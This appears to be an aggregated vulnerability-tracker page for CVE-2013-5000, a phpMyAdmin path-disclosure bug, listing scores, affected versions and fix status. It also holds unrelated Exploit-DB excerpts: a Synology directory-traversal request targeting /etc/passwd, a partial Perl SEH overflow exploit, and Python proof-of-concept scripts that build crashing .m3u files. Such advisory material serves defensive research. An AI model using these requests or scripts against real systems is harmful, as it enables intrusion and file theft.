CVE-2013-5000
published 2013-07-31CVE-2013-5000: phpMyAdmin 3.5.x before 3.5.8.2 allows remote attackers to obtain sensitive information via an invalid request, which reveals the installation path in an error…
PriorityP412medium5CVSS 2.0
AVNACLAuNCPINAN
EPSS
1.27%
66.5th percentile
phpMyAdmin 3.5.x before 3.5.8.2 allows remote attackers to obtain sensitive information via an invalid request, which reveals the installation path in an error message, related to config.default.php and other files.
Affected
17 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | phpmyadmin | < phpmyadmin 4:4.0.4.2-1 (bookworm) | phpmyadmin 4:4.0.4.2-1 (bookworm) |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | — | — |
| phpmyadmin | phpmyadmin | >= 0 < 4:4.0.4.2-1 | 4:4.0.4.2-1 |
| phpmyadmin | phpmyadmin | >= 0 < 4:4.0.4.2-1 | 4:4.0.4.2-1 |
| phpmyadmin | phpmyadmin | >= 0 < 4:4.0.4.2-1 | 4:4.0.4.2-1 |
| phpmyadmin | phpmyadmin | >= 0 < 4:4.0.4.2-1 | 4:4.0.4.2-1 |
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
osv5.0MEDIUM
vendor_cisco9.3CRITICAL
vendor_debian5.0LOW
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-cq7h-9hgp-vpjq: phpMyAdmin 3
ghsa_unreviewed·2022-05-17
CVE-2013-5000 [MEDIUM] CWE-200 GHSA-cq7h-9hgp-vpjq: phpMyAdmin 3
phpMyAdmin 3.5.x before 3.5.8.2 allows remote attackers to obtain sensitive information via an invalid request, which reveals the installation path in an error message, related to config.default.php and other files.
OSV
CVE-2013-5000: phpMyAdmin 3
osv·2013-07-31·CVSS 5.0
CVE-2013-5000 [MEDIUM] CVE-2013-5000: phpMyAdmin 3
phpMyAdmin 3.5.x before 3.5.8.2 allows remote attackers to obtain sensitive information via an invalid request, which reveals the installation path in an error message, related to config.default.php and other files.
Cisco
Cisco Device Manager Command Execution Vulnerability
vendor_cisco·2013-04-24·CVSS 9.3
CVE-2013-1192 [CRITICAL] CWE-20 Cisco Device Manager Command Execution Vulnerability
Cisco Device Manager Command Execution Vulnerability
Cisco Device Manager contains a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands on a client host with the privileges of the user. This vulnerability affects Cisco Device Manager for the Cisco MDS 9000 Family and Cisco Nexus 5000 Series Switches when it is installed or launched via the Java Network Launch Protocol (JNLP) on a host running Microsoft Windows.
Cisco Device Manager installed or launched from Cisco Prime Data Center Network Manager (DCNM) or Cisco Fabric Manager is not affected. This vulnerability can only be exploited if the JNLP file is executed on systems running Microsoft Windows. The vulnerability affects the confidentiality, integrity, and availability of the client host
Debian
CVE-2013-5000: phpmyadmin - phpMyAdmin 3.5.x before 3.5.8.2 allows remote attackers to obtain sensitive info...
vendor_debian·2013·CVSS 5.0
CVE-2013-5000 [MEDIUM] CVE-2013-5000: phpmyadmin - phpMyAdmin 3.5.x before 3.5.8.2 allows remote attackers to obtain sensitive info...
phpMyAdmin 3.5.x before 3.5.8.2 allows remote attackers to obtain sensitive information via an invalid request, which reveals the installation path in an error message, related to config.default.php and other files.
Scope: local
bookworm: resolved (fixed in 4:4.0.4.2-1)
bullseye: resolved (fixed in 4:4.0.4.2-1)
forky: resolved (fixed in 4:4.0.4.2-1)
sid: resolved (fixed in 4:4.0.4.2-1)
trixie: resolved (fixed in 4:4.0.4.2-1)
Cisco
Cisco Device Manager Command Execution Vulnerability
vendor_cisco
CVE-2013-1192 Cisco Device Manager Command Execution Vulnerability
CVE-2013-1192: Cisco Device Manager Command Execution Vulnerability
Cisco Device Manager contains a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands on a client host with the privileges of the user. This vulnerability affects Cisco Device Manager for the Cisco MDS 9000 Family and Cisco Nexus 5000 Series Switches when it is installed or launched via the Java Network Launch Protocol (JNLP) on a host running Microsoft Windows. Cisco Device Manager installed or launched from Cisco Prime Data Center Network Manager (DCNM) or Cisco Fabric Manager is not affected. This vulnerability can only be exploited if the JNLP file is executed on systems running Microsoft Windows. The vulnerability affects the confidentiality, integrity, and availability of th
No detection rules found.
Exploit-DB
Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)
exploitdb·2015-09-16
CVE-2015-2510 Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)
Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=469
The following crash was observed in Microsoft Office 2007 Excel with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.
Attached files:
Original File: 3013413838_orig.xls
Crashing File: 3013413838_crash.xls
Minimized Crashing File: 3013413838_min.xls
The minimized crashing file shows a one bit delta from the original file at offset 0x139F. OffVis did not reveal anything unique about this offset in the minimized file.
File Versions:
Excel.exe: 12.0.6718.5000
OGL.dll: 12.0.6719.5000
oart.dll: 12.0.6683.5002
GD
Exploit-DB
Microsoft Office 2007 - BIFFRecord Length Use-After-Free
exploitdb·2015-09-16
CVE-2015-2520 Microsoft Office 2007 - BIFFRecord Length Use-After-Free
Microsoft Office 2007 - BIFFRecord Length Use-After-Free
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=464
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.
Attached files:
Original File: 1105668828_orig.xls
Crashing File: 1105668828_crash.xls
Minimized Crashing File: 1105668828_min.xls
The minimized crashing file shows two one bit deltas from the original file. The first delta at offset 0x1CF7E and the second is at offset 0x3A966. Both of these offset appear to be BIFFRecord lengths.
File Versions:
Excel.exe: 12.0.6718.5000
MSO.dll: 12.0.6721.5000
Observed Crash:
eax=0000000
Exploit-DB
Microsoft Office 2007 - OLESSDirectyEntry.CreateTime Type Confusion
exploitdb·2015-09-16
CVE-2015-2521 Microsoft Office 2007 - OLESSDirectyEntry.CreateTime Type Confusion
Microsoft Office 2007 - OLESSDirectyEntry.CreateTime Type Confusion
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=465
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.
Attached files:
Original File: 1516065514_orig.xls
Crashing File: 1516065514_crash.xls
Minimized Crashing File: 1516065514_min.xls
The minimized crashing file shows a one bit deltas from the original file at offset 0x49E8. OffVis reports this to be the CreateTime field of an OLESSDirectoryEntry structure.
File Versions:
Excel.exe: 12.0.6718.5000
MSO.dll: 12.0.6721.5000
Observed Crash:
When run without Applicati
Exploit-DB
Synology DSM 4.3-3810 - Directory Traversal
exploitdb·2013-12-24
CVE-2013-6987 Synology DSM 4.3-3810 - Directory Traversal
Synology DSM 4.3-3810 - Directory Traversal
---
Title: Synology DSM multiple directory traversal
Version affected: /test/../../etc/passwd
- Remote file list:
POST /webapi/FileStation/file_share.cgi HTTP/1.1
Host: 192.168.56.101:5000
X-SYNO-TOKEN: XXXXXXXX
Content-Length: 75
Cookie: stay_login=0; id=f9EThJSyRaqJM; BCSI-CS-36db57a1c38ce2f6=2
folder_path=/test/../../tmp&api=SYNO.FileStation.List&method=list&version=1
Timeline:
- 05/12/2013: First contact with the vendor
- 06/12/2013: Vulnerability details sent to the vendor
- 20/12/2013: Patch released by the vendor
Exploit-DB
ALLPlayer 5.7 - '.m3u' UNICODE Buffer Overflow (SEH)
exploitdb·2013-11-24
CVE-2013-7409 ALLPlayer 5.7 - '.m3u' UNICODE Buffer Overflow (SEH)
ALLPlayer 5.7 - '.m3u' UNICODE Buffer Overflow (SEH)
---
#!/usr/bin/perl
###############################################################################
# Exploit Title: ALLPlayer 5.7 (.m3u) - SEH Buffer Overflow (Unicode)
# Date: 11-23-2013
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: ALLPlayer 5.7
# Software Link: http://www.allplayer.org/download/allplayer
# Version: 5.7
# Tested On: Windows XP SP3 and Windows 7 Pro SP1
##############################################################################
my $buffsize = 5000; # sets buffer size for consistent sized payload
my $junk = "http://" . "\x41" x 303; # offset to seh
my $nseh = "\x61\x62"; # overwrite next seh with popad (populates all registers) + nop
my $seh = "\x11\x66"; # overwrite seh with un
Exploit-DB
ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (PoC)
exploitdb·2013-10-10
CVE-2013-7409 ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (PoC)
ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (PoC)
---
Title: ALLPlayer Local Buffer Overflow PoC UNICODE
Vendor: http://www.allplayer.org/download/allplayer
Date found: 09.10.2013
Date published: 09.10.2013
Platform: windows 7 German
Bug: Buffer Overflow UNICODE
1)VERSIONS AFFECTED
----
ALLPlayer 5.6.2
2)Proof of Concept
junk = "http://"
buffer="\x41" * 5000
exploit = junk + buffer
try:
out_file = open("ALLPlayer_Poc.m3u",'w')
out_file.write(exploit)
out_file.close()
print "Exploit file created!"
except:
print "Error"
3)-(DEBUG)
(1e60.1dec): Access violation - code c0000005 (!!! second chance !!!)
*** WARNING: Unable to verify checksum for C:\Program Files\ALLPlayer\ALLPlayer.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\ALLPlayer\ALL
Exploit-DB
Hanso Player 2.1.0 - '.m3u' Buffer Overflow
exploitdb·2013-03-01
CVE-2013-7280 Hanso Player 2.1.0 - '.m3u' Buffer Overflow
Hanso Player 2.1.0 - '.m3u' Buffer Overflow
---
#!/usr/bin/python
# Exploit Title:Buffer Overflow Vulnerability Hanso Player version 2.1.0
# Download link :www.hansotools.com/downloads/hanso-player-setup.exe
# Author: metacom
# RST
# version: 2.1.0
# Category: poc
# Tested on: windows 7 German
f=open("fuzzzzz.m3u","w")
print "Creating expoit."
junk="\x41" * 5000
try:
f.write(junk)
f.close()
print "File created"
except:
print "File cannot be created"
2013-07-31
Published